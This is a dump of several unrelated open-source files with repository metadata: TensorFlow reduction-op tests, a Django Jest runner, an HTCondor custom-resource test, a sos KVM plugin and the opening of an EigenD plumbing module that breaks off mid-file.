self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testFloatReduce1D(self):
# Create a 1D array of floats
np_arr = np.arange(1, 6).reshape([5]).astype(np.float32)
self._compareAll(np_arr, [0])
def testFloatReduce2D(self):
# Create a 2D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 10).reshape([2, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [0, 1])
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testFloatReduce4D(self):
# Create a 4D array of floats and reduce across some
# dimensions
np_arr = np.arange(0, 210).reshape([2, 3, 5, 7]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
# Need specialization for reduce(4D, [0, 2])
# self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
self._compareAll(np_arr, [1, 2, 3])
self._compareAll(np_arr, [0, 1, 2, 3])
def testFloatReduce5D(self):
# Create a 5D array of floats and reduce across some dimensions
np_arr = np.arange(0, 840).reshape([2, 3, 5, 7, 4]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
# Need specialization for reduce(4D, [0, 2])
# self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
self._compareAll(np_arr, [1, 2, 3])
self._compareAll(np_arr, [0, 1, 2, 3])
self._compareAll(np_arr, [1, 2, 3, 4])
self._compareAll(np_arr, [0, 1, 2, 3, 4])
  # Simple tests for various types.
def testDoubleReduce1D(self):
np_arr = np.arange(1, 6).reshape([5]).astype(np.float64)
self._compare(np_arr, [], False)
self._compare(np_arr, [0], False)
def testInt32Reduce1D(self):
np_arr = np.arange(1, 6).reshape([5]).astype(np.int32)
self._compare(np_arr, [], False)
self._compare(np_arr, [0], False)
def testInvalidIndex(self):
np_arr = np.arange(0, 10).reshape([2, 5]).astype(np.float32)
input_tensor = tf.convert_to_tensor(np_arr)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Invalid reduction dimension" in str(e)):
tf.reduce_sum(input_tensor, [-1])
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Invalid reduction dimension" in str(e)):
tf.reduce_sum(input_tensor, [2])
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Invalid reduction dimension" in str(e)):
tf.reduce_sum(input_tensor, [0, 2])
# Int64??
def _compareGradient(self, shape, sum_shape, reduction_axes):
if reduction_axes is not None and np.shape(reduction_axes) == (1,):
# Test scalar reduction_axes argument
self._compareGradient(shape, sum_shape, reduction_axes[0])
x = np.arange(1.0, 49.0).reshape(shape).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_sum(t, reduction_axes)
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t,
shape,
su,
sum_shape,
x_init_value=x,
delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient(self):
self._compareGradient([2, 3, 4, 2], [2, 2], [1, 2])
def testGradient2(self):
self._compareGradient([2, 3, 4, 2], [2, 4, 2], [1])
def testGradient3(self):
self._compareGradient([2, 3, 4, 2], [2, 3, 2], [2])
def testGradient4(self):
self._compareGradient([2, 3, 4, 2], [], None)
class MeanReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims):
np_sum = x
count = 1
for ra in reduction_axes[::-1]:
np_sum = np.sum(np_sum, axis=ra, keepdims=keep_dims)
count *= x.shape[ra]
np_ans = np_sum / count
with self.test_session():
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_mean(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False)
self._compare(x, reduction_axes, True)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float32)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_mean(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_mean(t, [0, 1, 2, 3])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_mean(t, [])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
class ProdReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims):
np_ans = x
if reduction_axes is None:
np_ans = np.prod(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.prod(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session():
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_prod(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False)
self._compare(x, reduction_axes, True)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
# NOTE(kearnes): divide by 20 so product is a reasonable size
x = np.arange(1.0, 49.0).reshape(s).astype(np.float32) / 20.
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_prod(t, [])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_prod(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
su = tf.reduce_prod(t, [0, 1, 2, 3])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-3, atol=1e-3)
# NOTE(kearnes): the current gradient calculation gives NaNs for 0 inputs
x = np.arange(0.0, 48.0).reshape(s).astype(np.float32) / 20.
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_prod(t, [])
jacob_t, _ = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 4, 2], x_init_value=x, delta=1)
with self.assertRaisesOpError("Tensor had NaN values"):
tf.check_numerics(jacob_t, message="_ProdGrad NaN test").op.run()
class MinReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.amin(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.amin(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_min(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient2(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t, [1])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient3(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t, [2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient4(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_min(t)
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
class MaxReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.amax(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.amax(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_max(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testFloatReduce3D(self):
# Create a 3D array of floats and reduce across all possible
# dimensions
np_arr = np.arange(0, 30).reshape([2, 3, 5]).astype(np.float32)
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testGradient(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t, [1, 2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient2(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t, [1])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 4, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient3(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t, [2])
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [2, 3, 2], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
def testGradient4(self):
s = [2, 3, 4, 2]
x = np.arange(1.0, 49.0).reshape(s).astype(np.float64)
with self.test_session():
t = tf.convert_to_tensor(x)
su = tf.reduce_max(t)
jacob_t, jacob_n = gradient_checker.ComputeGradient(
t, s, su, [1], x_init_value=x, delta=1)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-8, atol=1e-8)
class AllReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.all(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.all(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_all(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testAll3D(self):
# Create a 3D array of bools and reduce across all possible
# dimensions
np_arr = (np.random.uniform(0, 1, 30) > 0.1).reshape([2, 3, 5])
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
class AnyReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.any(np_ans, keepdims=keep_dims)
else:
for ra in reduction_axes[::-1]:
np_ans = np.any(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
if reduction_axes is not None:
reduction_axes = np.array(reduction_axes).astype(np.int32)
tf_ans = tf.reduce_any(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
self._compare(x, reduction_axes, True, use_gpu=True)
self._compare(x, reduction_axes, True, use_gpu=False)
def testAll3D(self):
# Create a 3D array of bools and reduce across all possible
# dimensions
np_arr = (np.random.uniform(0, 1, 30) > 0.9).reshape([2, 3, 5])
self._compareAll(np_arr, None)
self._compareAll(np_arr, [])
self._compareAll(np_arr, [0])
self._compareAll(np_arr, [1])
self._compareAll(np_arr, [2])
self._compareAll(np_arr, [0, 1])
self._compareAll(np_arr, [1, 2])
self._compareAll(np_arr, [0, 2])
self._compareAll(np_arr, [0, 1, 2])
def testPartialShapes(self):
# Input shape is unknown.
c_unknown = tf.placeholder(tf.float32)
s_unknown = tf.reduce_sum(c_unknown, [1, 2])
self.assertEqual(tensor_shape.unknown_shape(), s_unknown.get_shape())
# Input shape only has known rank.
c_known_rank = tf.placeholder(tf.float32)
c_known_rank.set_shape(tensor_shape.unknown_shape(ndims=3))
s_known_rank = tf.reduce_sum(c_known_rank, [1, 2], keep_dims=True)
self.assertEqual(3, s_known_rank.get_shape().ndims)
# Reduction indices are unknown.
unknown_indices = tf.placeholder(tf.int32)
c_unknown_indices = tf.constant([[10.0], [20.0]])
s_unknown_indices = tf.reduce_sum(c_unknown_indices, unknown_indices,
keep_dims=False)
self.assertEqual(tensor_shape.unknown_shape(),
s_unknown_indices.get_shape())
s_unknown_indices_keep = tf.reduce_sum(c_unknown_indices, unknown_indices,
keep_dims=True)
self.assertEqual(2, s_unknown_indices_keep.get_shape().ndims)
if __name__ == "__main__":
tf.test.main()
| MehdiSfr/tensor-flow | tensorflow/python/kernel_tests/reduction_ops_test.py | Python | apache-2.0 | 20,753 |
from pathlib import Path
import shutil
from subprocess import call
from base.management import BaseCommand
from django.core.management import call_command
from django.conf import settings
BABEL_CONF = """
module.exports = {
presets: [
[
'@babel/preset-env',
{
targets: {
node: 'current',
},
},
],
],
}
"""
class Command(BaseCommand):
help = "Run jest unit tests."
    def handle(self, *args, **options):
call_command("transpile")
p = Path(settings.PROJECT_PATH) / ".transpile"
shutil.os.chdir(p)
conf_file = p / "babel.config.js"
if not conf_file.exists():
self.stdout.write(f'Creating "babel.config.js" at {p}.')
conf_file.write_text(BABEL_CONF)
command_array = [
p / "node_modules" / ".bin" / "jest",
"--no-cache",
"--passWithNoTests",
]
return_value = call(command_array)
if return_value > 0:
exit(return_value)
| fiduswriter/fiduswriter | fiduswriter/base/management/commands/jest.py | Python | agpl-3.0 | 1,082 |
#!/usr/bin/env pytest
#
# Test two each of two different custom machine resources in the same job,
# checking the sum and peak metrics for each. This set of tests is run
# against static slots for simplicity.
#
# Then repeat the test using partitionable slots. I've never seen the
# custom resource code fail in partitionable slots if it was working in
# static slots, so if you find a problem with partitionable slots and
# want to test the pieces individually, you'll have to change the code.
#
import pytest
import logging
import time
import textwrap
import htcondor
from ornithology import (
config,
standup,
action,
Condor,
format_script,
write_file,
track_quantity,
SetJobStatus,
JobStatus,
)
from libcmr import *
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
monitor_period = 5
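# Fake inventory used by this test: the number of instances per resource type, the
# per-instance usage values, and the per-instance peak-memory sequences that the
# generated discovery/monitor scripts report.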
resources = {
"SQUID": 4,
"TAKO": 4,
}
usages = {
"SQUID": [5, 1, 9, 4],
"TAKO": [500, 100, 900, 400],
}
peaks = {
"SQUID": [
[ 51, 51, 91, 11, 41, 41 ],
[ 42, 42, 92, 12, 52, 52 ],
[ 53, 53, 13, 93, 43, 43 ],
[ 44, 44, 14, 94, 54, 54 ],
],
"TAKO": [
[ 5100, 5100, 9100, 1100, 4100, 4100 ],
[ 4200, 4200, 9200, 1200, 5200, 5200 ],
[ 5300, 5300, 1300, 9300, 4300, 4300 ],
[ 4400, 4400, 1400, 9400, 5400, 5400 ],
],
}
@config(
params={
"TwoInstancesPerSlot": {
"config": {
"NUM_CPUS": "8",
"NUM_SLOTS": "2",
"NUM_SLOTS_TYPE_1": "2",
"SLOT_TYPE_1": "SQUIDs=2 TAKOs=2 CPUS=2",
"ADVERTISE_CMR_UPTIME_SECONDS": "TRUE",
"MACHINE_RESOURCE_INVENTORY_SQUIDs": "$(TEST_DIR)/SQUID-discovery.py",
"STARTD_CRON_SQUIDs_MONITOR_EXECUTABLE": "$(TEST_DIR)/SQUID-monitor.py",
"STARTD_CRON_SQUIDs_MONITOR_MODE": "periodic",
"STARTD_CRON_SQUIDs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_SQUIDs_MONITOR_METRICS": "SUM:SQUIDs, PEAK:SQUIDsMemory",
"MACHINE_RESOURCE_INVENTORY_TAKOs": "$(TEST_DIR)/TAKO-discovery.py",
"STARTD_CRON_TAKOs_MONITOR_EXECUTABLE": "$(TEST_DIR)/TAKO-monitor.py",
"STARTD_CRON_TAKOs_MONITOR_MODE": "periodic",
"STARTD_CRON_TAKOs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_TAKOs_MONITOR_METRICS": "SUM:TAKOs, PEAK:TAKOsMemory",
"STARTD_CRON_JOBLIST": "$(STARTD_CRON_JOBLIST) SQUIDs_MONITOR TAKOs_MONITOR",
},
},
"PartitionableSlots": {
"config": {
"NUM_CPUS": "8",
"NUM_SLOTS": "1",
"NUM_SLOTS_TYPE_1": "1",
"SLOT_TYPE_1": "100%",
"SLOT_TYPE_1_PARTITIONABLE": "TRUE",
"ADVERTISE_CMR_UPTIME_SECONDS": "TRUE",
"MACHINE_RESOURCE_INVENTORY_SQUIDs": "$(TEST_DIR)/SQUID-discovery.py",
"STARTD_CRON_SQUIDs_MONITOR_EXECUTABLE": "$(TEST_DIR)/SQUID-monitor.py",
"STARTD_CRON_SQUIDs_MONITOR_MODE": "periodic",
"STARTD_CRON_SQUIDs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_SQUIDs_MONITOR_METRICS": "SUM:SQUIDs, PEAK:SQUIDsMemory",
"MACHINE_RESOURCE_INVENTORY_TAKOs": "$(TEST_DIR)/TAKO-discovery.py",
"STARTD_CRON_TAKOs_MONITOR_EXECUTABLE": "$(TEST_DIR)/TAKO-monitor.py",
"STARTD_CRON_TAKOs_MONITOR_MODE": "periodic",
"STARTD_CRON_TAKOs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_TAKOs_MONITOR_METRICS": "SUM:TAKOs, PEAK:TAKOsMemory",
"STARTD_CRON_JOBLIST": "$(STARTD_CRON_JOBLIST) SQUIDs_MONITOR TAKOs_MONITOR",
},
},
}
)
def the_config(request):
return request.param
@config
def slot_config(the_config):
return the_config["config"]
@config
def num_resources():
nr = next(iter(resources.values()))
assert all(number == nr for number in resources.values())
return nr
@standup
def condor(test_dir, slot_config):
for resource in resources.keys():
sequence = { f"{resource}{i}": j for i, j in enumerate(usages[resource]) }
discovery_script = format_script(discovery_script_for(resource, sequence))
write_file(test_dir / f"{resource}-discovery.py", discovery_script)
sequences = { f"{resource}{i}": j for i, j in enumerate(peaks[resource]) }
monitor_script = both_monitor_script(resource, sequence, sequences)
write_file(test_dir / f"{resource}-monitor.py", monitor_script)
with Condor(
local_dir=test_dir / "condor",
config={**slot_config, "TEST_DIR": test_dir.as_posix()},
) as condor:
# Ornithology will run condor_who to verify that all the daemons are running,
# but occasionally, not all slots will have made it to the collector
num_slots = int(slot_config["NUM_SLOTS"])
loop_count = 0
while num_slots != len(condor.status(ad_type=htcondor.AdTypes.Startd, projection=["SlotID"])):
loop_count = loop_count + 1
assert(loop_count < 20)
time.sleep(1)
yield condor
def the_job(test_dir, resources):
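    # The job script polls the .update.ad in its scratch directory once per second,
    # printing the assigned custom resources and their reported memory usage.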
job_script = format_script( "#!/usr/bin/python3\n" + textwrap.dedent("""
import os
import sys
import time
elapsed = 0;
while elapsed < int(sys.argv[1]):""" +
"".join( f"""
os.system('condor_status -ads ${{_CONDOR_SCRATCH_DIR}}/.update.ad -af Assigned{resource}s {resource}sMemoryUsage')
""" for resource in resources
) +
"""
time.sleep(1)
elapsed += 1
""")
)
script_file = test_dir / "poll-memory.py"
write_file(script_file, job_script)
job_spec = {
"executable": script_file.as_posix(),
"arguments": "17",
"log": (test_dir / "events.log").as_posix(),
"output": (test_dir / "poll-memory.$(Cluster).$(Process).out").as_posix(),
"error": (test_dir / "poll-memory.$(Cluster).$(Process).err").as_posix(),
"getenv": "true",
"LeaveJobInQueue": "true",
}
for resource in resources:
job_spec[f"request_{resource}s"] = "2"
return job_spec
@action
def handle(test_dir, condor, num_resources):
handle = condor.submit(
description=the_job(test_dir, resources.keys()),
count=num_resources * 2
)
assert(handle.wait(verbose=True, timeout=180))
assert(condor.job_queue.wait_for_job_completion(handle.job_ids))
yield handle
handle.remove()
@action
def num_jobs_running_history(condor, handle, num_resources):
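    # Reconstruct how many of our jobs were running concurrently from the
    # job-queue status transitions.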
return track_quantity(
condor.job_queue.filter(lambda j, e: j in handle.job_ids),
increment_condition=lambda id_event: id_event[-1]
== SetJobStatus(JobStatus.RUNNING),
decrement_condition=lambda id_event: id_event[-1]
== SetJobStatus(JobStatus.COMPLETED),
max_quantity=num_resources,
expected_quantity=num_resources,
)
@action
def startd_log_file(condor):
return condor.startd_log.open()
@action
def num_busy_slots_history(startd_log_file, handle, num_resources):
logger.debug("Checking Startd log file...")
logger.debug("Expected Job IDs are: {}".format(handle.job_ids))
active_claims_history = track_quantity(
startd_log_file.read(),
increment_condition=lambda msg: "Changing activity: Idle -> Busy" in msg,
decrement_condition=lambda msg: "Changing activity: Busy -> Idle" in msg,
max_quantity=num_resources,
expected_quantity=num_resources,
)
return active_claims_history
class TestCustomMachineResources:
def test_correct_number_of_resources_assigned(self, condor):
for resource, number in resources.items():
result = condor.status(
ad_type=htcondor.AdTypes.Startd, projection=["SlotID", f"Assigned{resource}s"]
)
count = 0
for ad in result:
count += len(ad[f"Assigned{resource}s"].split(","))
assert(count == number)
def test_enough_jobs_running(
self, num_jobs_running_history, num_resources
):
assert (num_resources/2) in num_jobs_running_history
def test_never_too_many_jobs_running(
self, num_jobs_running_history, num_resources
):
assert max(num_jobs_running_history) <= (num_resources/2)
def test_enough_busy_slots(
self, num_busy_slots_history, num_resources
):
assert (num_resources/2) in num_busy_slots_history
def test_never_too_many_busy_slots(
self, num_busy_slots_history, num_resources
):
assert max(num_busy_slots_history) <= (num_resources/2)
def test_correct_uptimes_from_monitors(self, condor, handle):
for resource in resources.keys():
sequence = { f"{resource}{i}": j for i, j in enumerate(usages[resource]) }
sum_check_correct_uptimes(condor, handle, resource, sequence)
def test_correct_peaks_from_monitors(self, condor, handle):
for resource in resources.keys():
sequences = { f"{resource}{i}": j for i, j in enumerate(peaks[resource]) }
peak_check_correct_uptimes(condor, handle, resource, sequences)
def test_reported_usage_in_job_ads_and_event_log_match(
self, handle
):
for resource in resources.keys():
both_check_matching_usage(handle, resource)
| htcondor/htcondor | src/condor_tests/test_custom_machine_resource_instances.py | Python | apache-2.0 | 9,623 |
# Copyright (C) 2009 Red Hat, Inc., Joey Boggs <jboggs@redhat.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
import os
class Kvm(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
"""Kernel virtual machine
"""
plugin_name = 'kvm'
profiles = ('system', 'virt')
debugfs_path = "/sys/kernel/debug"
_debugfs_cleanup = False
def check_enabled(self):
return os.access("/sys/module/kvm", os.R_OK)
def setup(self):
self.add_copy_spec([
"/sys/module/kvm/srcversion",
"/sys/module/kvm_intel/srcversion",
"/sys/module/kvm_amd/srcversion",
"/sys/module/ksm/srcversion"
])
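        # kvm_stat needs debugfs; mount it temporarily if it is not already mounted
        # and clean it up again in postproc().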
if not os.path.ismount(self.debugfs_path):
self._debugfs_cleanup = True
r = self.call_ext_prog("mount -t debugfs debugfs %s"
% self.debugfs_path)
if r['status'] != 0:
self._log_error("debugfs not mounted and mount attempt failed")
self._debugfs_cleanup = False
return
self.add_cmd_output("kvm_stat --once")
    def postproc(self):
        if self._debugfs_cleanup and os.path.ismount(self.debugfs_path):
            r = self.call_ext_prog("umount %s" % self.debugfs_path)
            if r['status'] != 0:
                self._log_error("could not unmount %s" % self.debugfs_path)
# vim: set et ts=4 sw=4 :
| csutherl/sos | sos/plugins/kvm.py | Python | gpl-2.0 | 2,089 |
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, see <http://www.gnu.org/licenses/>.
#
from pi.logic.shortcuts import *
from pi import action,logic,async,domain,agent
from plg_language import interpreter, interpreter_version as version
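# Prolog-style rules describing which objects count as connectable inputs/outputs
# and how existing connections are enumerated; the connect_*, unconnect_* and
# dump_* predicates below are queried by the Plumber agent through the logic database.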
rules_conn = """
connect_contains(A,A).
connect_contains(A,B) :- @partof(B,A), @not(@protocol(explicit,B)).
connect_contains(A,B) :- @assocwith_direct(B,A), @not(@protocol(explicit,B)).
